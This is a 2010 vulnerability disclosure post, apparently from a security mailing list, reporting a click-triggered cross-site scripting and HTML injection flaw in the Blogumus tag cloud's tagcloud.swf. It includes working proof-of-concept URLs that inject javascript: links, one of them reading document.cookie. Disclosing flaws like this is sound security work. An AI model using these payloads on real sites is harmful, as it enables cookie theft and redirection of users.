Related information

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

XSS Vulnerability in Active Calendar 1.2.0

Cross-Site Scripting vulnerability in JVClouds3D for Joomla

From:	MustLive <mustlive_(at)_websecurity.com.ua>
Date:	12.01.2010
Subject:	Cross-Site Scripting vulnerability in Blogumus

Hello 3APA3A!

I want to warn you about Cross-Site Scripting vulnerability in
Blogumus for Blogger

It is similar to XSS vulnerability in WP-Cumulus
(http://websecurity.com.ua/3665/), because it's using tagcloud.swf
made by author of WP-Cumulus. About millions of flash files
tagcloud.swf which are vulnerable to XSS attacks I mentioned in my
article XSS vulnerabilities in 8 millions flash files
(http://websecurity.com.ua/3789/) and wrote in my article XSS
vulnerabilities in 34 millions flash files
(http://websecurity.com.ua/3842/).

XSS:

Code will execute after click. It's strictly social XSS. Also it's
possible to conduct HTML Injection attack (like in WP-Cumulus).

http://halotemplates.s3.amazonaws.com/wp-cumulus-example/tagcloud.swf?mode=tags&
tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.
cookie)'+style='font-size:
+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

http://halotemplates.s3.amazonaws.com/wp-cumulus-example/tagcloud.swf?mode=tags&
tagcloud=%3Ctags%3E%3Ca+href='javascript:document.
location%3D%22http://websecurity.com.ua%22'+style='font-size:
+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

http://halotemplates.s3.amazonaws.com/wp-cumulus-example/tagcloud.swf?mode=tags&
tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+styl
e='font-size:
+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

I mentioned about this vulnerability at my site
(http://websecurity.com.ua/3843/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua